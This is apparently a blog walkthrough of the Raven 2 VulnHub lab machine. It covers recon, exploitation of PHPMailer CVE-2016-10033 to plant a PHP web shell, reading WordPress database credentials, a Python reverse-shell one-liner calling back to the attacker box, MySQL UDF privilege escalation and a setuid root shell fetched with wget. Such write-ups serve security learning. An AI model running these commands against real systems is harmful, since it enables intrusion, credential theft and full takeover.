Raven 2 from Vulnhub complete walkthrough

Aloha!
in this post i’ll describe complete walkthrough for Raven 2 box (available @ https://www.vulnhub.com/entry/raven-2,269/).
initial setup is as follows: raven2.local has IP 192.168.56.4, my kali virtual box is at 192.168.56.3, host box has 192.168.56.1.

let’s do some recon with nmap:

root@kali:~/vulnhub/raven# nmap -sS -sV  raven.local  
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-16 22:39 EET
Nmap scan report for raven.local (192.168.56.4)
Host is up (0.000037s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)
MAC Address: 08:00:27:26:B2:37 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.50 seconds


From service detection OpenSSH appears to be vulerable to CVE-2018-15473. Metasploit has good exploit for this (exploits/linux/remote/45233.py). However, bruteforcing of any kind is not a good idea at this point, so let’s dig deeper.
Second service is RPC at port 111. Let’s take a closer look:

root@kali:~/vulnhub/raven# nmap -sS -sV --script rpcinfo raven.local -p 111  
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-17 16:43 EET
Nmap scan report for raven.local (192.168.56.4)
Host is up (0.00020s latency).

PORT    STATE SERVICE VERSION
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:  
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          45718/tcp  status
|_  100024  1          50675/udp  status
MAC Address: 08:00:27:26:B2:37 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.45 seconds



All of my attempts to interact with these services failed, so i proceeded to third service, Apache 2.4.10.
Browsing a little bit showed that backend application implemented in PHP. Nice. Let’s do some enumeration:

Looking for dirs:


root@kali:~/vulnhub/raven# wfuzz -t 64 --hc 404 -w /usr/share/wordlists/dirb/big.txt raven.local/FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://raven.local/FUZZ
Total requests: 20469

==================================================================
ID      Response   Lines      Word         Chars          Payload     
==================================================================

000015:  C=403     11 L       32 W          295 Ch        ".htaccess"
000016:  C=403     11 L       32 W          295 Ch        ".htpasswd"
005517:  C=301      9 L       28 W          308 Ch        "css"
007795:  C=301      9 L       28 W          310 Ch        "fonts"
009464:  C=301      9 L       28 W          308 Ch        "img"
010190:  C=301      9 L       28 W          307 Ch        "js"
011356:  C=301      9 L       28 W          311 Ch        "manual"
016215:  C=403     11 L       32 W          299 Ch        "server-status"
019078:  C=301      9 L       28 W          311 Ch        "vendor"
019909:  C=301      9 L       28 W          314 Ch        "wordpress"

Total time: 19.17196
Processed Requests: 20469
Filtered Requests: 20459
Requests/sec.: 1067.652



Interesting folders are vendor and wordpress. A little bit of browsing of /vendor showed that there’s PHPMailer installed and probably web app uses it in some way.
Taking a quick look on files accessible through browser i noticed two important things:
1. http://raven.local/vendor/VERSION this file discloses PHPMailer version, which appears to be 5.2.16. According to Metasploit, it’s vulnerable to RCE (CVE 2016-10033). But at this point PHPMailer library was not much helping, ’cause I still had no idea, how web app uses it.
2. http://raven.local/vendor/PATH contains absolute path /var/www/html/vendor/ and flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}. yeah, baby.

Well, now we have something. Let’s do some more enumeration. Next run of wfuzz looked for PHP scripts available:

root@kali:~/vulnhub/raven# wfuzz -t 64 --hc 404 -w /usr/share/wordlists/dirb/big.txt raven.local/FUZZ.php

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://raven.local/FUZZ.php
Total requests: 20469

==================================================================
ID      Response   Lines      Word         Chars          Payload     
==================================================================

005172:  C=200    224 L      677 W         9699 Ch        "contact"
000015:  C=403     11 L       32 W          299 Ch        ".htaccess"
000016:  C=403     11 L       32 W          299 Ch        ".htpasswd"

Total time: 19.22307
Processed Requests: 20469
Filtered Requests: 20466
Requests/sec.: 1064.814

Quick browsing of contact.php with firefox devtools showed that mail.php accepts name, message, action and email parameters. Unfortunately, requesting mail.php resulted in 404. Embarassing…

I tried harder. ZIP time, wfuzz:

root@kali:~/vulnhub/raven# wfuzz -t 64 --hc 404 -w /usr/share/wordlists/dirb/big.txt raven.local/FUZZ.zip

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://raven.local/FUZZ.zip
Total requests: 20469

==================================================================
ID      Response   Lines      Word         Chars          Payload     
==================================================================

000015:  C=403     11 L       32 W          299 Ch        ".htaccess"
000016:  C=403     11 L       32 W          299 Ch        ".htpasswd"
005172:  C=200     18 L      103 W         3384 Ch        "contact"

Total time: 17.71362
Processed Requests: 20469
Filtered Requests: 20466
Requests/sec.: 1155.551

Webmaster was so kind to leave me some sources in contact.zip. Below is quick exceprt to analyze interaction between web app and vulnerable PHPMailer:

if (isset($_REQUEST['action'])){
        $name=$_REQUEST['name'];
        $email=$_REQUEST['email'];
        $message=$_REQUEST['message'];
        if (($name=="")||($email=="")||($message=="")){
                echo "There are missing fields.";
        }else{
                require 'vulnerable/PHPMailerAutoload.php';
                $mail = new PHPMailer;
                $mail->Host = "localhost";
                $mail->setFrom($email, 'Vulnerable Server');
                $mail->addAddress('admin@vulnerable.com', 'Hacker');
                $mail->Subject  = "Message from $name";
                $mail->Body     = $message;
                if(!$mail->send()) {
                        echo 'Message was not sent.';
                        echo 'Mailer error: ' . $mail->ErrorInfo;
                } else {
                        echo 'Message has been sent.';
                }
        }
}  

Exploit time! To be honest, i spent hard time trying to modify anarcoder’s exploit for PHPMailer (exploits/php/webapps/40974.py). I attached it to post, so you can enjoy.
In the end i dropped my simple php shell to /vendor folder like this:

root@kali:~/vulnhub/raven# python phpmailer.py  
PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com
Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski

[+] SeNdiNG eVIl SHeLL To TaRGeT....
[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D

Browsing to http://raven.local/vendor/phpcode3.php?cmd=id;%20whoami;%20ls%20-la; showed some l00t:


-------------skip----------------
02835 >>> some"@email.com... Unbalanced '"'
02835 <<< To: Hacker <admin@vulnerable.com>
02835 <<< Subject: Message from admin
02835 <<< X-PHP-Originating-Script: 0:class.phpmailer.php
02835 <<< Date: Wed, 16 Jan 2019 09:33:09 +1100
02835 <<< From: Vulnerable Server <"attacker\" -oQ/tmp/ -X/var/www/html/vendor/phpcode3.php  some"@email.com>
02835 <<< Message-ID: <82d20106c705f7a4293fe1867f0cb76f@raven.local>
02835 <<< X-Mailer: PHPMailer 5.2.17 (https://github.com/PHPMailer/PHPMailer)
02835 <<< MIME-Version: 1.0
02835 <<< Content-Type: text/plain; charset=iso-8859-1
02835 <<<  
02835 <<< uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
total 652
drwxrwxrwx  7 root     root       4096 Jan 16 09:33 .
drwxrwxrwx 10 root     root       4096 Aug 13 17:28 ..
-rwxrwxrwx  1 root     root        287 Aug 13 07:56 .gitattributes
-rwxrwxrwx  1 root     root         79 Aug 13 07:56 .gitignore
-rwxrwxrwx  1 root     root       3627 Aug 13 07:56 .scrutinizer.yml
-rwxrwxrwx  1 root     root        884 Aug 13 07:56 .travis.yml
-rwxrwxrwx  1 root     root      26421 Aug 13 07:56 LICENSE
-rw-r--r--  1 root     root         62 Nov  9 08:17 PATH
-rwxrwxrwx  1 root     root       1689 Aug 13 07:56 PHPMailerAutoload.php
-rwxrwxrwx  1 root     root      13334 Aug 13 07:56 README.md
-rwxrwxrwx  1 root     root       2329 Aug 13 07:56 SECURITY.md
-rwxrwxrwx  1 root     root          6 Aug 13 07:56 VERSION
-rwxrwxrwx  1 root     root      28961 Aug 13 07:56 changelog.md
-rwxrwxrwx  1 root     root     144358 Aug 13 07:56 class.phpmailer.php
-rwxrwxrwx  1 root     root       7216 Aug 13 07:56 class.phpmaileroauth.php
-rwxrwxrwx  1 root     root       2464 Aug 13 07:56 class.phpmaileroauthgoogle.php
-rwxrwxrwx  1 root     root      11006 Aug 13 07:56 class.pop3.php
-rwxrwxrwx  1 root     root      42054 Aug 13 07:56 class.smtp.php
-rwxrwxrwx  1 root     root       1163 Aug 13 07:56 composer.json
-rwxrwxrwx  1 root     root     129288 Aug 13 07:56 composer.lock
drwxrwxrwx  2 root     root       4096 Aug 13 07:56 docs
drwxrwxrwx  5 root     root       4096 Aug 13 07:56 examples
drwxrwxrwx  2 root     root       4096 Aug 13 07:56 extras
-rwxrwxrwx  1 root     root       5036 Aug 13 07:56 get_oauth_token.php
drwxrwxrwx  2 root     root       4096 Aug 13 07:56 language
-rw-r--r--  1 www-data www-data  15557 Jan 16 09:33 phpcode3.php
drwxrwxrwx  2 root     root       4096 Aug 13 07:56 test
-rwxrwxrwx  1 root     root       1074 Aug 13 07:56 travis.phpunit.xml.dist
-------------skip----------------



Great. Gimme something more…

Output from http://raven.local/vendor/phpcode3.php?cmd=find%20/var/www/%20-type%20f disclosed two flags and wp-config.php

------------skip-----------------
/var/www/html/wordpress/wp-config.php
------------skip-----------------
/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png
------------skip-----------------
/var/www/flag2.txt
------------skip-----------------

Let’s grab MySQL credentials…

http://raven.local/vendor/phpcode3.php?cmd=cat /var/www/html/wordpress/wp-config.php | grep DB

------------skip-----------------
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'R@v3nSecurity');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8mb4');
define('DB_COLLATE', '');
------------skip-----------------

…and surprisingly i found out that MySQL runs as root!
http://raven.local/vendor/phpcode3.php?cmd=ps aux | grep mysql

------------skip-----------------
root       521  0.0  0.3   4340  1624 ?        S    03:44   0:00 /bin/sh /usr/bin/mysqld_safe
root       885  0.1 10.1 552020 51608 ?        Sl   03:44   0:22 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log
/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
www-data  3061  0.0  0.1   4340   812 ?        S    09:48   0:00 sh -c ps aux | grep mysql
www-data  3063  0.0  0.1  11132   964 ?        S    09:48   0:00 grep mysql
------------skip-----------------


Such setup is pretty weird, but it opens a root door for me.
Time to set up reverse shell. I prefer to use python one-liner:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2
);p=subprocess.call(["/bin/sh","-i"]);'


so if i launch on my kali box  

root@kali:~/vulnhub/raven# nc -l -p 4444 -vv
Listening on [unknown] (family 0, port -739699315)


and request  

http://raven.local/vendor/phpcode3.php?cmd=python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.56.3”,4444));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’



reverse shell will pop up in nc session.

The idea of privilege escalation is that combination of MySQL root credentials and MySQL service running with root privileges allows to conduct MySQL UDF command execution attack (brief description http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html)

So let’s begin.
1. i grabbed libmysqludf to my kali box:
git clone https://github.com/mysqludf/lib_mysqludf_sys
2. since Raven2 is x64 box, i compiled it accordingly.
3. and finally, moved resulting library named lib_mysqludf_sys2.so to raven’s /tmp folder.  

At this point, everything is ready to inject my evil plugin into MySQL.

Spawn /bin/bash:

root@kali:~/vulnhub/raven# nc -l -p 4444 -vv
Listening on [unknown] (family 0, port 692340109)
Connection from raven.local 34332 received!
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash");'
www-data@Raven:/var/www/html/vendor$  

Get into MySQL shell using creds from WordPress:

www-data@Raven:/var/www/html/vendor$ mysql -u root -p'R@v3nSecurity' mysql
mysql -u root -p'R@v3nSecurity' mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 41
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>  

and then do a little magic:

mysql> CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys2.so';
<mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys2.so';              
Query OK, 0 rows affected (0.01 sec)

mysql> CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys2.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys2.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys2.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys2.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys2.so';
Query OK, 0 rows affected (0.00 sec)

just to check:

mysql> select sys_eval('id');
select sys_eval('id');
+-----------------------------------------+
| sys_eval('id')                          |
+-----------------------------------------+
| uid=0(root) gid=0(root) groups=0(root)  |
+-----------------------------------------+

w00tw00t.

Final headshot:

mysql> \! wget 192.168.56.3/rootshell.c -O /tmp/rootshell.c
mysql> \! gcc /tmp/rootshell.c -o /tmp/rootshell
mysql> select sys_eval('chmod +x /tmp/rootshell;   chown root:root /tmp/rootshell; chmod +s /tmp/rootshell; ');

where rootshell.c is simple setuid bash:


#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}




last flag resides in /root folder:

root@Raven:/tmp# cat /root/flag4.txt
cat /root/flag4.txt
 ___                   ___ ___  
| _ \__ ___ _____ _ _ |_ _|_ _|
|   / _` \ V / -_) ' \ | | | |  
|_|_\__,_|\_/\___|_||_|___|___|
                           
flag4{df2bc5e951d91581467bb9a2a8ff4425}

CONGRATULATIONS on successfully rooting RavenII

I hope you enjoyed this second interation of the Raven VM

Hit me up on Twitter and let me know what you thought:  

@mccannwj / wjmccann.github.io

Tags:  ,

Leave a reply